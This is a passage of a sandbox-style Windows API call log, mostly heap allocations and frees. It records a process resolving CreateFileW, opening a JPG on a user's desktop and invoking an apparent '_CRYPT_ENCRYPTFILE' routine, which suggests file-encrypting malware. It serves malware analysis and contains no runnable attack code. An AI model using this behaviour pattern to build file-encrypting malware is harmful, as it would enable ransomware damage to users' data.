[0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0134.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.720] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0134.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb078 [0134.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0134.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0134.720] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0134.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0134.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0134.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\phzrcch.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0134.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.723] FreeLibrary (hLibModule=0x772d0000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0134.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.724] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0134.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.725] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.725] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0134.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d7d0 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0134.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0134.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca940, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0134.727] CloseHandle (hObject=0x258) returned 1 [0134.727] FreeLibrary (hLibModule=0x772d0000) returned 1 [0134.727] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0134.727] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, 